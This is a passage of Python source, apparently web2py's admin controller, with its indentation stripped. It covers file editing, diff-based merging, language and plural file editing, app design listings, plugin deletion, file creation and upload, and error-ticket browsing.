return response.json(dict(files=files, message=T.M('Searching: **%s** %%{file}', len(files))))
def edit():
""" File edit handler """
# Load json only if it is ajax edited...
app = get_app(request.vars.app)
app_path = apath(app, r=request)
preferences = {'theme': 'web2py', 'editor': 'default', 'closetag': 'true', 'codefolding': 'false', 'tabwidth': '4', 'indentwithtabs': 'false', 'linenumbers': 'true', 'highlightline': 'true'}
config = Config(os.path.join(request.folder, 'settings.cfg'),
section='editor', default_values={})
preferences.update(config.read())
if not(request.ajax) and not(is_mobile):
# return the scaffolding, the rest will be through ajax requests
response.title = T('Editing %s') % app
return response.render('default/edit.html', dict(app=app, editor_settings=preferences))
# show settings tab and save prefernces
if 'settings' in request.vars:
if request.post_vars: # save new preferences
if PY2:
post_vars = request.post_vars.items()
else:
post_vars = list(request.post_vars.items())
# Since unchecked checkbox are not serialized, we must set them as false by hand to store the correct preference in the settings
post_vars += [(opt, 'false') for opt in preferences if opt not in request.post_vars]
if config.save(post_vars):
response.headers["web2py-component-flash"] = T('Preferences saved correctly')
else:
response.headers["web2py-component-flash"] = T('Preferences saved on session only')
response.headers["web2py-component-command"] = "update_editor(%s);$('a[href=#editor_settings] button.close').click();" % response.json(config.read())
return
else:
details = {'realfilename': 'settings', 'filename': 'settings', 'id': 'editor_settings', 'force': False}
details['plain_html'] = response.render('default/editor_settings.html', {'editor_settings': preferences})
return response.json(details)
""" File edit handler """
# Load json only if it is ajax edited...
app = get_app(request.vars.app)
filename = '/'.join(request.args)
realfilename = request.args[-1]
if request.vars.app:
path = abspath(filename)
else:
path = apath(filename, r=request)
# Try to discover the file type
if filename[-3:] == '.py':
filetype = 'python'
elif filename[-5:] == '.html':
filetype = 'html'
elif filename[-5:] == '.load':
filetype = 'html'
elif filename[-4:] == '.css':
filetype = 'css'
elif filename[-3:] == '.js':
filetype = 'javascript'
else:
filetype = 'html'
# ## check if file is not there
if ('revert' in request.vars) and os.path.exists(path + '.bak'):
try:
data = safe_read(path + '.bak')
data1 = safe_read(path)
except IOError:
session.flash = T('Invalid action')
if 'from_ajax' in request.vars:
return response.json({'error': str(T('Invalid action'))})
else:
redirect(URL('site'))
safe_write(path, data)
file_hash = md5_hash(data)
saved_on = time.ctime(os.stat(path)[stat.ST_MTIME])
safe_write(path + '.bak', data1)
response.flash = T('file "%s" of %s restored', (filename, saved_on))
else:
try:
data = safe_read(path)
except IOError:
session.flash = T('Invalid action')
if 'from_ajax' in request.vars:
return response.json({'error': str(T('Invalid action'))})
else:
redirect(URL('site'))
lineno_old = count_lines(data)
file_hash = md5_hash(data)
saved_on = time.ctime(os.stat(path)[stat.ST_MTIME])
if request.vars.file_hash and request.vars.file_hash != file_hash:
session.flash = T('file changed on disk')
data = request.vars.data.replace('\r\n', '\n').strip() + '\n'
safe_write(path + '.1', data)
if 'from_ajax' in request.vars:
return response.json({'error': str(T('file changed on disk')),
'redirect': URL('resolve',
args=request.args)})
else:
redirect(URL('resolve', args=request.args))
elif request.vars.data:
safe_write(path + '.bak', data)
data = request.vars.data.replace('\r\n', '\n').strip() + '\n'
safe_write(path, data)
lineno_new = count_lines(data)
log_progress(
app, 'EDIT', filename, progress=lineno_new - lineno_old)
file_hash = md5_hash(data)
saved_on = time.ctime(os.stat(path)[stat.ST_MTIME])
response.flash = T('file saved on %s', saved_on)
data_or_revert = (request.vars.data or request.vars.revert)
# Check compile errors
highlight = None
if filetype == 'python' and request.vars.data:
import _ast
try:
code = request.vars.data.rstrip().replace('\r\n', '\n') + '\n'
compile(code, path, "exec", _ast.PyCF_ONLY_AST)
except Exception as e:
# offset calculation is only used for textarea (start/stop)
start = sum([len(line) + 1 for l, line
in enumerate(request.vars.data.split("\n"))
if l < e.lineno - 1])
if e.text and e.offset:
offset = e.offset - (len(e.text) - len(
e.text.splitlines()[-1]))
else:
offset = 0
highlight = {'start': start, 'end': start +
offset + 1, 'lineno': e.lineno, 'offset': offset}
try:
ex_name = e.__class__.__name__
except:
ex_name = 'unknown exception!'
response.flash = DIV(T('failed to compile file because:'), BR(),
B(ex_name), ' ' + T('at line %s', e.lineno),
offset and ' ' +
T('at char %s', offset) or '',
PRE(repr(e)))
if data_or_revert and request.args[1] == 'modules':
# Lets try to reload the modules
try:
mopath = '.'.join(request.args[2:])[:-3]
exec('import applications.%s.modules.%s' % (
request.args[0], mopath))
reload(sys.modules['applications.%s.modules.%s'
% (request.args[0], mopath)])
except Exception as e:
response.flash = DIV(
T('failed to reload module because:'), PRE(repr(e)))
edit_controller = None
editviewlinks = None
view_link = None
if filetype == 'html' and len(request.args) >= 3:
cfilename = os.path.join(request.args[0], 'controllers',
request.args[2] + '.py')
if os.path.exists(apath(cfilename, r=request)):
edit_controller = URL('edit', args=[cfilename.replace(os.sep, "/")])
view = request.args[3].replace('.html', '')
view_link = URL(request.args[0], request.args[2], view)
elif filetype == 'python' and request.args[1] == 'controllers':
# it's a controller file.
# Create links to all of the associated view files.
app = get_app()
viewname = os.path.splitext(request.args[2])[0]
viewpath = os.path.join(app, 'views', viewname)
aviewpath = apath(viewpath, r=request)
viewlist = []
if os.path.exists(aviewpath):
if os.path.isdir(aviewpath):
viewlist = glob(os.path.join(aviewpath, '*.html'))
elif os.path.exists(aviewpath + '.html'):
viewlist.append(aviewpath + '.html')
if len(viewlist):
editviewlinks = []
for v in sorted(viewlist):
vf = os.path.split(v)[-1]
vargs = "/".join([viewpath.replace(os.sep, "/"), vf])
editviewlinks.append(A(vf.split(".")[0],
_class="editor_filelink",
_href=URL('edit', args=[vargs])))
if len(request.args) > 2 and request.args[1] == 'controllers':
controller = (request.args[2])[:-3]
functions = find_exposed_functions(data)
functions = functions and sorted(functions) or []
else:
(controller, functions) = (None, None)
if 'from_ajax' in request.vars:
return response.json({'file_hash': file_hash, 'saved_on': saved_on, 'functions': functions, 'controller': controller, 'application': request.args[0], 'highlight': highlight})
else:
file_details = dict(app=request.args[0],
lineno=request.vars.lineno or 1,
editor_settings=preferences,
filename=filename,
realfilename=realfilename,
filetype=filetype,
data=data,
edit_controller=edit_controller,
file_hash=file_hash,
saved_on=saved_on,
controller=controller,
functions=functions,
view_link=view_link,
editviewlinks=editviewlinks,
id=IS_SLUG()(filename)[0],
force=True if (request.vars.restore or
request.vars.revert) else False)
plain_html = response.render('default/edit_js.html', file_details)
file_details['plain_html'] = plain_html
if is_mobile:
return response.render('default.mobile/edit.html',
file_details, editor_settings=preferences)
else:
return response.json(file_details)
def todolist():
""" Returns all TODO of the requested app
"""
app = request.vars.app or ''
app_path = apath('%(app)s' % {'app': app}, r=request)
dirs = ['models', 'controllers', 'modules', 'private']
def listfiles(app, dir, regexp='.*\.py$'):
files = sorted(listdir(apath('%(app)s/%(dir)s/' % {'app': app, 'dir': dir}, r=request), regexp))
files = [x.replace(os.path.sep, '/') for x in files if not x.endswith('.bak')]
return files
pattern = '#\s*(todo)+\s+(.*)'
regex = re.compile(pattern, re.IGNORECASE)
output = []
for d in dirs:
for f in listfiles(app, d):
matches = []
filename = apath(os.path.join(app, d, f), r=request)
with safe_open(filename, 'r') as f_s:
src = f_s.read()
for m in regex.finditer(src):
start = m.start()
lineno = src.count('\n', 0, start) + 1
matches.append({'text': m.group(0), 'lineno': lineno})
if len(matches) != 0:
output.append({'filename': f, 'matches': matches, 'dir': d})
return {'todo': output, 'app': app}
def editor_sessions():
config = Config(os.path.join(request.folder, 'settings.cfg'),
section='editor_sessions', default_values={})
preferences = config.read()
if request.vars.session_name and request.vars.files:
session_name = request.vars.session_name
files = request.vars.files
preferences.update({session_name: ','.join(files)})
if config.save(preferences.items()):
response.headers["web2py-component-flash"] = T('Session saved correctly')
else:
response.headers["web2py-component-flash"] = T('Session saved on session only')
return response.render('default/editor_sessions.html', {'editor_sessions': preferences})
def resolve():
"""
"""
filename = '/'.join(request.args)
# ## check if file is not there
path = apath(filename, r=request)
a = safe_read(path).split('\n')
try:
b = safe_read(path + '.1').split('\n')
except IOError:
session.flash = 'Other file, no longer there'
redirect(URL('edit', args=request.args))
d = difflib.ndiff(a, b)
def leading(line):
""" """
# TODO: we really need to comment this
z = ''
for (k, c) in enumerate(line):
if c == ' ':
z += ' '
elif c == ' \t':
z += ' '
elif k == 0 and c == '?':
pass
else:
break
return XML(z)
def getclass(item):
""" Determine item class """
operators = {' ': 'normal', '+': 'plus', '-': 'minus'}
return operators[item[0]]
if request.vars:
c = '\n'.join([item[2:].rstrip() for (i, item) in enumerate(d) if item[0]
== ' ' or 'line%i' % i in request.vars])
safe_write(path, c)
session.flash = 'files merged'
redirect(URL('edit', args=request.args))
else:
# Making the short circuit compatible with <= python2.4
gen_data = lambda index, item: not item[:1] in ['+', '-'] and "" \
or INPUT(_type='checkbox',
_name='line%i' % index,
value=item[0] == '+')
diff = TABLE(*[TR(TD(gen_data(i, item)),
TD(item[0]),
TD(leading(item[2:]),
TT(item[2:].rstrip())),
_class=getclass(item))
for (i, item) in enumerate(d) if item[0] != '?'])
return dict(diff=diff, filename=filename)
def edit_language():
""" Edit language file """
app = get_app()
filename = '/'.join(request.args)
response.title = request.args[-1]
strings = read_dict(apath(filename, r=request))
if '__corrupted__' in strings:
form = SPAN(strings['__corrupted__'], _class='error')
return dict(filename=filename, form=form)
keys = sorted(strings.keys(), key=lambda x: to_native(x).lower())
rows = []
rows.append(H2(T('Original/Translation')))
for key in keys:
name = md5_hash(key)
s = strings[key]
(prefix, sep, key) = key.partition('\x01')
if sep:
prefix = SPAN(prefix + ': ', _class='tm_ftag')
k = key
else:
(k, prefix) = (prefix, '')
_class = 'untranslated' if k == s else 'translated'
if len(s) <= 40:
elem = INPUT(_type='text', _name=name, value=s,
_size=70, _class=_class)
else:
elem = TEXTAREA(_name=name, value=s, _cols=70,
_rows=5, _class=_class)
# Making the short circuit compatible with <= python2.4
k = (s != k) and k or B(k)
new_row = DIV(LABEL(prefix, k, _style="font-weight:normal;"),
CAT(elem, '\n', TAG.BUTTON(
T('delete'),
_onclick='return delkey("%s")' % name,
_class='btn')), _id=name, _class='span6 well well-small')
rows.append(DIV(new_row, _class="row-fluid"))
rows.append(DIV(INPUT(_type='submit', _value=T('update'), _class="btn btn-primary"), _class='controls'))
form = FORM(*rows)
if form.accepts(request.vars, keepvalues=True):
strs = dict()
for key in keys:
name = md5_hash(key)
if form.vars[name] == chr(127):
continue
strs[key] = form.vars[name]
write_dict(apath(filename, r=request), strs)
session.flash = T('file saved on %(time)s', dict(time=time.ctime()))
redirect(URL(r=request, args=request.args))
return dict(app=request.args[0], filename=filename, form=form)
def edit_plurals():
""" Edit plurals file """
app = get_app()
filename = '/'.join(request.args)
plurals = read_plural_dict(
apath(filename, r=request)) # plural forms dictionary
nplurals = int(request.vars.nplurals) - 1 # plural forms quantity
xnplurals = xrange(nplurals)
if '__corrupted__' in plurals:
# show error message and exit
form = SPAN(plurals['__corrupted__'], _class='error')
return dict(filename=filename, form=form)
keys = sorted(plurals.keys(), lambda x, y: cmp(
unicode(x, 'utf-8').lower(), unicode(y, 'utf-8').lower()))
tab_rows = []
for key in keys:
name = md5_hash(key)
forms = plurals[key]
if len(forms) < nplurals:
forms.extend(None for i in xrange(nplurals - len(forms)))
tab_col1 = DIV(CAT(LABEL(T("Singular Form")), B(key,
_class='fake-input')))
tab_inputs = [SPAN(LABEL(T("Plural Form #%s", n + 1)), INPUT(_type='text', _name=name + '_' + str(n), value=forms[n], _size=20), _class='span6') for n in xnplurals]
tab_col2 = DIV(CAT(*tab_inputs))
tab_col3 = DIV(CAT(LABEL(XML(' ')), TAG.BUTTON(T('delete'), _onclick='return delkey("%s")' % name, _class='btn'), _class='span6'))
tab_row = DIV(DIV(tab_col1, '\n', tab_col2, '\n', tab_col3, _class='well well-small'), _id=name, _class='row-fluid tab_row')
tab_rows.append(tab_row)
tab_rows.append(DIV(TAG['button'](T('update'), _type='submit',
_class='btn btn-primary'),
_class='controls'))
tab_container = DIV(*tab_rows, **dict(_class="row-fluid"))
form = FORM(tab_container)
if form.accepts(request.vars, keepvalues=True):
new_plurals = dict()
for key in keys:
name = md5_hash(key)
if form.vars[name + '_0'] == chr(127):
continue
new_plurals[key] = [form.vars[name + '_' + str(n)]
for n in xnplurals]
write_plural_dict(apath(filename, r=request), new_plurals)
session.flash = T('file saved on %(time)s', dict(time=time.ctime()))
redirect(URL(r=request, args=request.args, vars=dict(
nplurals=request.vars.nplurals)))
return dict(app=request.args[0], filename=filename, form=form)
def about():
""" Read about info """
app = get_app()
# ## check if file is not there
about = safe_read(apath('%s/ABOUT' % app, r=request))
license = safe_read(apath('%s/LICENSE' % app, r=request))
return dict(app=app, about=MARKMIN(about), license=MARKMIN(license), progress=report_progress(app))
def design():
""" Application design handler """
app = get_app()
if not response.flash and app == request.application:
msg = T('ATTENTION: you cannot edit the running application!')
response.flash = msg
if request.vars and not request.vars.token == session.token:
redirect(URL('logout'))
if request.vars.pluginfile is not None and not isinstance(request.vars.pluginfile, str):
filename = os.path.basename(request.vars.pluginfile.filename)
if plugin_install(app, request.vars.pluginfile.file,
request, filename):
session.flash = T('new plugin installed')
redirect(URL('design', args=app))
else:
session.flash = \
T('unable to install plugin "%s"', filename)
redirect(URL(r=request, args=app))
elif isinstance(request.vars.pluginfile, str):
session.flash = T('plugin not specified')
redirect(URL(r=request, args=app))
# If we have only pyc files it means that
# we cannot design
if os.path.exists(apath('%s/compiled' % app, r=request)):
session.flash = \
T('application is compiled and cannot be designed')
redirect(URL('site'))
# Get all models
models = listdir(apath('%s/models/' % app, r=request), '.*\.py$')
models = [x.replace('\\', '/') for x in models]
defines = {}
for m in models:
data = safe_read(apath('%s/models/%s' % (app, m), r=request))
defines[m] = regex_tables.findall(data)
defines[m].sort()
# Get all controllers
controllers = sorted(
listdir(apath('%s/controllers/' % app, r=request), '.*\.py$'))
controllers = [x.replace('\\', '/') for x in controllers]
functions = {}
for c in controllers:
data = safe_read(apath('%s/controllers/%s' % (app, c), r=request))
items = find_exposed_functions(data)
functions[c] = items and sorted(items) or []
# Get all views
views = sorted(
listdir(apath('%s/views/' % app, r=request), '[\w/\-]+(\.\w+)+$'))
views = [x.replace('\\', '/') for x in views if not x.endswith('.bak')]
extend = {}
include = {}
for c in views:
data = safe_read(apath('%s/views/%s' % (app, c), r=request))
items = regex_extend.findall(data)
if items:
extend[c] = items[0][1]
items = regex_include.findall(data)
include[c] = [i[1] for i in items]
# Get all modules
modules = listdir(apath('%s/modules/' % app, r=request), '.*\.py$')
modules = modules = [x.replace('\\', '/') for x in modules]
modules.sort()
# Get all private files
privates = listdir(apath('%s/private/' % app, r=request), '[^\.#].*')
privates = [x.replace('\\', '/') for x in privates]
privates.sort()
# Get all static files
statics = listdir(apath('%s/static/' % app, r=request), '[^\.#].*',
maxnum=MAXNFILES)
statics = [x.replace(os.path.sep, '/') for x in statics]
statics.sort()
# Get all languages
langpath = os.path.join(apath(app, r=request), 'languages')
languages = dict([(lang, info) for lang, info
in iteritems(read_possible_languages(langpath))
if info[2] != 0]) # info[2] is langfile_mtime:
# get only existed files
# Get crontab
cronfolder = apath('%s/cron' % app, r=request)
crontab = apath('%s/cron/crontab' % app, r=request)
if not is_gae:
if not os.path.exists(cronfolder):
os.mkdir(cronfolder)
if not os.path.exists(crontab):
safe_write(crontab, '#crontab')
plugins = []
def filter_plugins(items, plugins):
plugins += [item[7:].split('/')[0].split(
'.')[0] for item in items if item.startswith('plugin_')]
plugins[:] = list(set(plugins))
plugins.sort()
return [item for item in items if not item.startswith('plugin_')]
return dict(app=app,
models=filter_plugins(models, plugins),
defines=defines,
controllers=filter_plugins(controllers, plugins),
functions=functions,
views=filter_plugins(views, plugins),
modules=filter_plugins(modules, plugins),
extend=extend,
include=include,
privates=filter_plugins(privates, plugins),
statics=filter_plugins(statics, plugins),
languages=languages,
crontab=crontab,
plugins=plugins)
def delete_plugin():
""" Object delete handler """
app = request.args(0)
plugin = request.args(1)
plugin_name = 'plugin_' + plugin
dialog = FORM.confirm(
T('Delete'),
{T('Cancel'): URL('design', args=app)})
if dialog.accepted:
try:
for folder in ['models', 'views', 'controllers', 'static', 'modules', 'private']:
path = os.path.join(apath(app, r=request), folder)
for item in os.listdir(path):
if item.rsplit('.', 1)[0] == plugin_name:
filename = os.path.join(path, item)
if os.path.isdir(filename):
shutil.rmtree(filename)
else:
os.unlink(filename)
session.flash = T('plugin "%(plugin)s" deleted',
dict(plugin=plugin))
except Exception:
session.flash = T('unable to delete file plugin "%(plugin)s"',
dict(plugin=plugin))
redirect(URL('design', args=request.args(0), anchor=request.vars.id2))
return dict(dialog=dialog, plugin=plugin)
def plugin():
""" Application design handler """
app = get_app()
plugin = request.args(1)
if not response.flash and app == request.application:
msg = T('ATTENTION: you cannot edit the running application!')
response.flash = msg
# If we have only pyc files it means that
# we cannot design
if os.path.exists(apath('%s/compiled' % app, r=request)):
session.flash = \
T('application is compiled and cannot be designed')
redirect(URL('site'))
# Get all models
models = listdir(apath('%s/models/' % app, r=request), '.*\.py$')
models = [x.replace('\\', '/') for x in models]
defines = {}
for m in models:
data = safe_read(apath('%s/models/%s' % (app, m), r=request))
defines[m] = regex_tables.findall(data)
defines[m].sort()
# Get all controllers
controllers = sorted(
listdir(apath('%s/controllers/' % app, r=request), '.*\.py$'))
controllers = [x.replace('\\', '/') for x in controllers]
functions = {}
for c in controllers:
data = safe_read(apath('%s/controllers/%s' % (app, c), r=request))
items = find_exposed_functions(data)
functions[c] = items and sorted(items) or []
# Get all views
views = sorted(
listdir(apath('%s/views/' % app, r=request), '[\w/\-]+\.\w+$'))
views = [x.replace('\\', '/') for x in views]
extend = {}
include = {}
for c in views:
data = safe_read(apath('%s/views/%s' % (app, c), r=request))
items = regex_extend.findall(data)
if items:
extend[c] = items[0][1]
items = regex_include.findall(data)
include[c] = [i[1] for i in items]
# Get all modules
modules = listdir(apath('%s/modules/' % app, r=request), '.*\.py$')
modules = modules = [x.replace('\\', '/') for x in modules]
modules.sort()
# Get all private files
privates = listdir(apath('%s/private/' % app, r=request), '[^\.#].*')
privates = [x.replace('\\', '/') for x in privates]
privates.sort()
# Get all static files
statics = listdir(apath('%s/static/' % app, r=request), '[^\.#].*',
maxnum=MAXNFILES)
statics = [x.replace(os.path.sep, '/') for x in statics]
statics.sort()
# Get all languages
languages = sorted([lang + '.py' for lang, info in
iteritems(T.get_possible_languages_info())
if info[2] != 0]) # info[2] is langfile_mtime:
# get only existed files
# Get crontab
crontab = apath('%s/cron/crontab' % app, r=request)
if not os.path.exists(crontab):
safe_write(crontab, '#crontab')
def filter_plugins(items):
regex = re.compile('^plugin_' + plugin + '(/.*|\..*)?$')
return [item for item in items if item and regex.match(item)]
return dict(app=app,
models=filter_plugins(models),
defines=defines,
controllers=filter_plugins(controllers),
functions=functions,
views=filter_plugins(views),
modules=filter_plugins(modules),
extend=extend,
include=include,
privates=filter_plugins(privates),
statics=filter_plugins(statics),
languages=languages,
crontab=crontab)
def create_file():
""" Create files handler """
if request.vars and not request.vars.token == session.token:
redirect(URL('logout'))
try:
anchor = '#' + request.vars.id if request.vars.id else ''
if request.vars.app:
app = get_app(request.vars.app)
path = abspath(request.vars.location)
else:
if request.vars.dir:
request.vars.location += request.vars.dir + '/'
app = get_app(name=request.vars.location.split('/')[0])
path = apath(request.vars.location, r=request)
filename = re.sub('[^\w./-]+', '_', request.vars.filename)
if path[-7:] == '/rules/':
# Handle plural rules files
if len(filename) == 0:
raise SyntaxError
if not filename[-3:] == '.py':
filename += '.py'
lang = re.match('^plural_rules-(.*)\.py$', filename).group(1)
langinfo = read_possible_languages(apath(app, r=request))[lang]
text = dedent("""
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Plural-Forms for %(lang)s (%(langname)s)
nplurals=2 # for example, English language has 2 forms:
# 1 singular and 1 plural
# Determine plural_id for number *n* as sequence of positive
# integers: 0,1,...
# NOTE! For singular form ALWAYS return plural_id = 0
get_plural_id = lambda n: int(n != 1)
# Construct and return plural form of *word* using
# *plural_id* (which ALWAYS>0). This function will be executed
# for words (or phrases) not found in plural_dict dictionary.
# By default this function simply returns word in singular:
construct_plural_form = lambda word, plural_id: word
""")[1:] % dict(lang=langinfo[0], langname=langinfo[1])
elif path[-11:] == '/languages/':
# Handle language files
if len(filename) == 0:
raise SyntaxError
if not filename[-3:] == '.py':
filename += '.py'
path = os.path.join(apath(app, r=request), 'languages', filename)
if not os.path.exists(path):
safe_write(path, '')
# create language xx[-yy].py file:
findT(apath(app, r=request), filename[:-3])
session.flash = T('language file "%(filename)s" created/updated',
dict(filename=filename))
redirect(request.vars.sender + anchor)
elif path[-8:] == '/models/':
# Handle python models
if not filename[-3:] == '.py':
filename += '.py'
if len(filename) == 3:
raise SyntaxError
text = '# -*- coding: utf-8 -*-\n'
elif path[-13:] == '/controllers/':
# Handle python controllers
if not filename[-3:] == '.py':
filename += '.py'
if len(filename) == 3:
raise SyntaxError
text = '# -*- coding: utf-8 -*-\n# %s\ndef index(): return dict(message="hello from %s")'
text = text % (T('try something like'), filename)
elif path[-7:] == '/views/':
if request.vars.plugin and not filename.startswith('plugin_%s/' % request.vars.plugin):
filename = 'plugin_%s/%s' % (request.vars.plugin, filename)
# Handle template (html) views
if filename.find('.') < 0:
filename += '.html'
extension = filename.split('.')[-1].lower()
if len(filename) == 5:
raise SyntaxError
msg = T(
'This is the %(filename)s template', dict(filename=filename))
if extension == 'html':
text = dedent("""
{{extend 'layout.html'}}
<h1>%s</h1>
{{=BEAUTIFY(response._vars)}}""" % msg)[1:]
else:
generic = os.path.join(path, 'generic.' + extension)
if os.path.exists(generic):
text = read_file(generic)
else:
text = ''
elif path[-9:] == '/modules/':
if request.vars.plugin and not filename.startswith('plugin_%s/' % request.vars.plugin):
filename = 'plugin_%s/%s' % (request.vars.plugin, filename)
# Handle python module files
if not filename[-3:] == '.py':
filename += '.py'
if len(filename) == 3:
raise SyntaxError
text = dedent("""
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from gluon import *\n""")[1:]
elif (path[-8:] == '/static/') or (path[-9:] == '/private/'):
if (request.vars.plugin and
not filename.startswith('plugin_%s/' % request.vars.plugin)):
filename = 'plugin_%s/%s' % (request.vars.plugin, filename)
text = ''
else:
redirect(request.vars.sender + anchor)
full_filename = os.path.join(path, filename)
dirpath = os.path.dirname(full_filename)
if not os.path.exists(dirpath):
os.makedirs(dirpath)
if os.path.exists(full_filename):
raise SyntaxError
safe_write(full_filename, text)
log_progress(app, 'CREATE', filename)
if request.vars.dir:
result = T('file "%(filename)s" created',
dict(filename=full_filename[len(path):]))
else:
session.flash = T('file "%(filename)s" created',
dict(filename=full_filename[len(path):]))
vars = {}
if request.vars.id:
vars['id'] = request.vars.id
if request.vars.app:
vars['app'] = request.vars.app
redirect(URL('edit',
args=[os.path.join(request.vars.location, filename)], vars=vars))
except Exception as e:
if not isinstance(e, HTTP):
session.flash = T('cannot create file')
if request.vars.dir:
response.flash = result
response.headers['web2py-component-content'] = 'append'
response.headers['web2py-component-command'] = "%s %s %s" % (
"$.web2py.invalidate('#files_menu');",
"load_file('%s');" % URL('edit', args=[app, request.vars.dir, filename]),
"$.web2py.enableElement($('#form form').find($.web2py.formInputClickSelector));")
return ''
else:
redirect(request.vars.sender + anchor)
def listfiles(app, dir, regexp='.*\.py$'):
files = sorted(
listdir(apath('%(app)s/%(dir)s/' % {'app': app, 'dir': dir}, r=request), regexp))
files = [x.replace('\\', '/') for x in files if not x.endswith('.bak')]
return files
def editfile(path, file, vars={}, app=None):
args = (path, file) if 'app' in vars else (app, path, file)
url = URL('edit', args=args, vars=vars)
return A(file, _class='editor_filelink', _href=url, _style='word-wrap: nowrap;')
def files_menu():
app = request.vars.app or 'welcome'
dirs = [{'name': 'models', 'reg': '.*\.py$'},
{'name': 'controllers', 'reg': '.*\.py$'},
{'name': 'views', 'reg': '[\w/\-]+(\.\w+)+$'},
{'name': 'modules', 'reg': '.*\.py$'},
{'name': 'static', 'reg': '[^\.#].*'},
{'name': 'private', 'reg': '.*\.py$'}]
result_files = []
for dir in dirs:
result_files.append(TAG[''](LI(dir['name'], _class="nav-header component", _onclick="collapse('" + dir['name'] + "_files');"),
LI(UL(*[LI(editfile(dir['name'], f, dict(id=dir['name'] + f.replace('.', '__')), app), _style="overflow:hidden", _id=dir['name'] + "__" + f.replace('.', '__'))
for f in listfiles(app, dir['name'], regexp=dir['reg'])],
_class="nav nav-list small-font"),
_id=dir['name'] + '_files', _style="display: none;")))
return dict(result_files=result_files)
def upload_file():
""" File uploading handler """
if request.vars and not request.vars.token == session.token:
redirect(URL('logout'))
try:
filename = None
app = get_app(name=request.vars.location.split('/')[0])
path = apath(request.vars.location, r=request)
if request.vars.filename:
filename = re.sub('[^\w\./]+', '_', request.vars.filename)
else:
filename = os.path.split(request.vars.file.filename)[-1]
if path[-8:] == '/models/' and not filename[-3:] == '.py':
filename += '.py'
if path[-9:] == '/modules/' and not filename[-3:] == '.py':
filename += '.py'
if path[-13:] == '/controllers/' and not filename[-3:] == '.py':
filename += '.py'
if path[-7:] == '/views/' and not filename[-5:] == '.html':
filename += '.html'
if path[-11:] == '/languages/' and not filename[-3:] == '.py':
filename += '.py'
filename = os.path.join(path, filename)
dirpath = os.path.dirname(filename)
if not os.path.exists(dirpath):
os.makedirs(dirpath)
data = request.vars.file.file.read()
lineno = count_lines(data)
safe_write(filename, data, 'wb')
log_progress(app, 'UPLOAD', filename, lineno)
session.flash = T('file "%(filename)s" uploaded',
dict(filename=filename[len(path):]))
except Exception:
if filename:
d = dict(filename=filename[len(path):])
else:
d = dict(filename='unknown')
session.flash = T('cannot upload file "%(filename)s"', d)
redirect(request.vars.sender)
def errors():
""" Error handler """
import operator
import os
import hashlib
app = get_app()
if is_gae:
method = 'dbold' if ('old' in
(request.args(1) or '')) else 'dbnew'
else:
method = request.args(1) or 'new'
db_ready = {}
db_ready['status'] = get_ticket_storage(app)
db_ready['errmessage'] = T(
"No ticket_storage.txt found under /private folder")
db_ready['errlink'] = "http://web2py.com/books/default/chapter/29/13#Collecting-tickets"
if method == 'new':
errors_path = apath('%s/errors' % app, r=request)
delete_hashes = []
for item in request.vars:
if item[:7] == 'delete_':
delete_hashes.append(item[7:])
hash2error = dict()
for fn in listdir(errors_path, '^[a-fA-F0-9.\-]+$'):
fullpath = os.path.join(errors_path, fn)
if not os.path.isfile(fullpath):
continue
try:
fullpath_file = safe_open(fullpath, 'rb')
try:
error = pickle.load(fullpath_file)
finally:
fullpath_file.close()
except IOError:
continue
except EOFError:
continue
hash = hashlib.md5(to_bytes(error['traceback'])).hexdigest()
if hash in delete_hashes:
os.unlink(fullpath)
else:
try:
hash2error[hash]['count'] += 1
except KeyError:
error_lines = error['traceback'].split("\n")
last_line = error_lines[-2] if len(error_lines) > 1 else 'unknown'
error_causer = os.path.split(error['layer'])[1]
hash2error[hash] = dict(count=1, pickel=error,
causer=error_causer,
last_line=last_line,
hash=hash, ticket=fn)
decorated = [(x['count'], x) for x in hash2error.values()]
decorated.sort(key=operator.itemgetter(0), reverse=True)
return dict(errors=[x[1] for x in decorated], app=app, method=method, db_ready=db_ready)
elif method == 'dbnew':
errors_path = apath('%s/errors' % app, r=request)
tk_db, tk_table = get_ticket_storage(app)
delete_hashes = []
for item in request.vars:
if item[:7] == 'delete_':
delete_hashes.append(item[7:])
hash2error = dict()
for fn in tk_db(tk_table.id > 0).select():
try:
error = pickle.loads(fn.ticket_data)
hash = hashlib.md5(error['traceback']).hexdigest()
if hash in delete_hashes:
tk_db(tk_table.id == fn.id).delete()
tk_db.commit()
else:
try:
hash2error[hash]['count'] += 1
except KeyError:
error_lines = error['traceback'].split("\n")
last_line = error_lines[-2]
error_causer = os.path.split(error['layer'])[1]
hash2error[hash] = dict(count=1,
pickel=error, causer=error_causer,
last_line=last_line, hash=hash,
ticket=fn.ticket_id)
except AttributeError as e:
tk_db(tk_table.id == fn.id).delete()
tk_db.commit()
decorated = [(x['count'], x) for x in hash2error.values()]
decorated.sort(key=operator.itemgetter(0), reverse=True)
return dict(errors=[x[1] for x in decorated], app=app,
method=method, db_ready=db_ready)
elif method == 'dbold':
tk_db, tk_table = get_ticket_storage(app)
for item in request.vars:
if item[:7] == 'delete_':
tk_db(tk_table.ticket_id == item[7:]).delete()
tk_db.commit()
tickets_ = tk_db(tk_table.id > 0).select(tk_table.ticket_id,
tk_table.created_datetime,
orderby=~tk_table.created_datetime)
tickets = [row.ticket_id for row in tickets_]
times = dict([(row.ticket_id, row.created_datetime) for
row in tickets_])
return dict(app=app, tickets=tickets, method=method,
times=times, db_ready=db_ready)
else:
for item in request.vars:
# delete_all rows doesn't contain any ticket
# Remove anything else as requested
if item[:7] == 'delete_' and (not item == "delete_all}"):
os.unlink(apath('%s/errors/%s' % (app, item[7:]), r=request))
func = lambda p: os.stat(apath('%s/errors/%s' %
(app, p), r=request)).st_mtime
tickets = sorted(
listdir(apath('%s/errors/' % app, r=request), '^\w.*'),
key=func,
reverse=True)
return dict(app=app, tickets=tickets, method=method, db_ready=db_ready)
def get_ticket_storage(app):
private_folder = apath('%s/private' % app, r=request)
ticket_file = os.path.join(private_folder, 'ticket_storage.txt')
if os.path.exists(ticket_file):
db_string = safe_open(ticket_file).read()
db_string = db_string.strip().replace('\r', '').replace('\n', '')
elif is_gae:
# use Datastore as fallback if there is no ticket_file
db_string = "google:datastore"
else:
return False
tickets_table = 'web2py_ticket'
tablename = tickets_table + '_' + app
db_path = apath('%s/databases' % app, r=request)
ticketsdb = DAL(db_string, folder=db_path, auto_import=True)
if not ticketsdb.get(tablename):
table = ticketsdb.define_table(
tablename,
Field('ticket_id', length=100),
Field('ticket_data', 'text'),
Field('created_datetime', 'datetime'),
)
return ticketsdb, ticketsdb.get(tablename)
def make_link(path):
""" Create a link from a path """
